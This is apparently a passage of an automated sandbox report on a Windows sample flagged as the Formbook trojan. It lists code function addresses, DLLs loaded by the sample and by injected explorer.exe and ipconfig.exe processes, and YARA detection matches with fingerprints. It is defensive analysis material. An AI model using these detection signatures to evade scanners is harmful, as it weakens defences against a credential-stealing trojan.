Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01754750	5_2_01754750
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172C7C0	5_2_0172C7C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174C6E0	5_2_0174C6E0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01746962	5_2_01746962
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017329A0	5_2_017329A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017FA9A6	5_2_017FA9A6
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173A840	5_2_0173A840
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01732840	5_2_01732840
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175E8F0	5_2_0175E8F0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017168B8	5_2_017168B8
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EAB40	5_2_017EAB40
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E6BD7	5_2_017E6BD7
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CCD1F	5_2_017CCD1F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173AD00	5_2_0173AD00
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172ADE0	5_2_0172ADE0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01748DBF	5_2_01748DBF
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730C00	5_2_01730C00
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720CF2	5_2_01720CF2
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0CB5	5_2_017D0CB5
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A4F40	5_2_017A4F40
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01750F30	5_2_01750F30
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D2F30	5_2_017D2F30
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01772F28	5_2_01772F28
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173CFE0	5_2_0173CFE0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01722FC8	5_2_01722FC8
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017AEFA0	5_2_017AEFA0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730E59	5_2_01730E59
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EEE26	5_2_017EEE26
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EEEDB	5_2_017EEEDB
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01742E90	5_2_01742E90
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017ECE93	5_2_017ECE93
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171F172	5_2_0171F172
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017FB16B	5_2_017FB16B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0176516C	5_2_0176516C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173B1B0	5_2_0173B1B0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E70E9	5_2_017E70E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EF0E0	5_2_017EF0E0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017DF0CC	5_2_017DF0CC
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017370C0	5_2_017370C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171D34C	5_2_0171D34C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E132D	5_2_017E132D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0177739A	5_2_0177739A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D12ED	5_2_017D12ED
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174B2C0	5_2_0174B2C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017352A0	5_2_017352A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E7571	5_2_017E7571
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CD5B0	5_2_017CD5B0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01721460	5_2_01721460
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EF43F	5_2_017EF43F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EF7B0	5_2_017EF7B0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E16CC	5_2_017E16CC
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01739950	5_2_01739950
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174B950	5_2_0174B950
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C5910	5_2_017C5910
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179D800	5_2_0179D800
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017338E0	5_2_017338E0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EFB76	5_2_017EFB76
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A5BF0	5_2_017A5BF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0176DBF9	5_2_0176DBF9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174FB80	5_2_0174FB80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A3A6C	5_2_017A3A6C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EFA49	5_2_017EFA49
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E7A46	5_2_017E7A46
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017DDAC6	5_2_017DDAC6
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CDAAC	5_2_017CDAAC
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01775AA0	5_2_01775AA0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D1AA3	5_2_017D1AA3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E7D73	5_2_017E7D73
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E1D5A	5_2_017E1D5A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01733D40	5_2_01733D40
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174FDC0	5_2_0174FDC0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A9C32	5_2_017A9C32
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EFCF2	5_2_017EFCF2
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EFF09	5_2_017EFF09
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EFFB1	5_2_017EFFB1
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01731F92	5_2_01731F92
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01739EB0	5_2_01739EB0
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3B5232	6_2_0E3B5232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3AFB32	6_2_0E3AFB32
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3AFB30	6_2_0E3AFB30
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3B4036	6_2_0E3B4036
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3AB082	6_2_0E3AB082
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3B2912	6_2_0E3B2912
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3ACD02	6_2_0E3ACD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3B85CD	6_2_0E3B85CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA6232	6_2_0FDA6232
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA95CD	6_2_0FDA95CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA3912	6_2_0FDA3912
Source: C:\Windows\explorer.exe	Code function: 6_2_0FD9DD02	6_2_0FD9DD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA0B32	6_2_0FDA0B32
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA0B30	6_2_0FDA0B30
Source: C:\Windows\explorer.exe	Code function: 6_2_0FD9C082	6_2_0FD9C082
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA5036	6_2_0FDA5036
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00C739FE	7_2_00C739FE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D402C0	7_2_02D402C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D60274	7_2_02D60274
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CCE3F0	7_2_02CCE3F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D803E6	7_2_02D803E6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7A352	7_2_02D7A352
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D52000	7_2_02D52000
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D781CC	7_2_02D781CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D801AA	7_2_02D801AA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D741A2	7_2_02D741A2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D48158	7_2_02D48158
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB0100	7_2_02CB0100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D5A118	7_2_02D5A118
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CDC6E0	7_2_02CDC6E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CBC7C0	7_2_02CBC7C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CE4750	7_2_02CE4750
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC0770	7_2_02CC0770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D6E4F6	7_2_02D6E4F6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D72446	7_2_02D72446
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D64420	7_2_02D64420
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D80591	7_2_02D80591
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC0535	7_2_02CC0535
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CBEA80	7_2_02CBEA80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D76BD7	7_2_02D76BD7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7AB40	7_2_02D7AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CEE8F0	7_2_02CEE8F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CA68B8	7_2_02CA68B8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CCA840	7_2_02CCA840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC2840	7_2_02CC2840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC29A0	7_2_02CC29A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D8A9A6	7_2_02D8A9A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CD6962	7_2_02CD6962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7EEDB	7_2_02D7EEDB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7CE93	7_2_02D7CE93
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CD2E90	7_2_02CD2E90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC0E59	7_2_02CC0E59
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7EE26	7_2_02D7EE26
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB2FC8	7_2_02CB2FC8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CCCFE0	7_2_02CCCFE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D3EFA0	7_2_02D3EFA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D34F40	7_2_02D34F40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D62F30	7_2_02D62F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D02F28	7_2_02D02F28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CE0F30	7_2_02CE0F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB0CF2	7_2_02CB0CF2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D60CB5	7_2_02D60CB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC0C00	7_2_02CC0C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CBADE0	7_2_02CBADE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CD8DBF	7_2_02CD8DBF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D5CD1F	7_2_02D5CD1F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CCAD00	7_2_02CCAD00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CDB2C0	7_2_02CDB2C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D612ED	7_2_02D612ED
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC52A0	7_2_02CC52A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D0739A	7_2_02D0739A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CAD34C	7_2_02CAD34C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7132D	7_2_02D7132D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC70C0	7_2_02CC70C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D6F0CC	7_2_02D6F0CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7F0E0	7_2_02D7F0E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D770E9	7_2_02D770E9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CCB1B0	7_2_02CCB1B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF516C	7_2_02CF516C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D8B16B	7_2_02D8B16B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CAF172	7_2_02CAF172
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D716CC	7_2_02D716CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D05630	7_2_02D05630
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7F7B0	7_2_02D7F7B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB1460	7_2_02CB1460
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7F43F	7_2_02D7F43F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D895C3	7_2_02D895C3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D5D5B0	7_2_02D5D5B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D77571	7_2_02D77571
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D6DAC6	7_2_02D6DAC6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D05AA0	7_2_02D05AA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D61AA3	7_2_02D61AA3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D5DAAC	7_2_02D5DAAC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D77A46	7_2_02D77A46
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7FA49	7_2_02D7FA49
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D33A6C	7_2_02D33A6C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D35BF0	7_2_02D35BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CFDBF9	7_2_02CFDBF9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CDFB80	7_2_02CDFB80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7FB76	7_2_02D7FB76
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC38E0	7_2_02CC38E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D2D800	7_2_02D2D800
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC9950	7_2_02CC9950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CDB950	7_2_02CDB950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D55910	7_2_02D55910
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC9EB0	7_2_02CC9EB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02C83FD2	7_2_02C83FD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02C83FD5	7_2_02C83FD5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC1F92	7_2_02CC1F92
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7FFB1	7_2_02D7FFB1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7FF09	7_2_02D7FF09
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D7FCF2	7_2_02D7FCF2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D39C32	7_2_02D39C32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CDFDC0	7_2_02CDFDC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC3D40	7_2_02CC3D40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D71D5A	7_2_02D71D5A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02D77D73	7_2_02D77D73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EE1E5	7_2_001EE1E5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EE266	7_2_001EE266
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EE5B4	7_2_001EE5B4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001ED5A3	7_2_001ED5A3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EDAE6	7_2_001EDAE6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EDB92	7_2_001EDB92
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001D2D90	7_2_001D2D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EDD87	7_2_001EDD87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001D9E60	7_2_001D9E60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EDEB9	7_2_001EDEB9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001D2FB0	7_2_001D2FB0

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: String function: 017AF290 appears 105 times
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: String function: 01777E54 appears 101 times
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: String function: 0179EA12 appears 86 times
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: String function: 0171B970 appears 280 times
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: String function: 01765130 appears 58 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02CAB970 appears 280 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02D07E54 appears 110 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02D3F290 appears 105 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02CF5130 appears 58 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02D2EA12 appears 86 times

Source: hj3YCvtlg7.exe

Static PE information: invalid certificate

Source: hj3YCvtlg7.exe	Binary or memory string: OriginalFilename vs hj3YCvtlg7.exe
Source: hj3YCvtlg7.exe, 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs hj3YCvtlg7.exe
Source: hj3YCvtlg7.exe, 00000000.00000002.1353495106.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs hj3YCvtlg7.exe
Source: hj3YCvtlg7.exe, 00000000.00000002.1356812219.00000000072D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs hj3YCvtlg7.exe
Source: hj3YCvtlg7.exe, 00000005.00000002.1405518091.000000000181D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs hj3YCvtlg7.exe
Source: hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001277000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs hj3YCvtlg7.exe
Source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs hj3YCvtlg7.exe
Source: hj3YCvtlg7.exe	Binary or memory string: OriginalFilenameUuoN.exeX vs hj3YCvtlg7.exe

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wininet.dll	Jump to behavior

Source: hj3YCvtlg7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
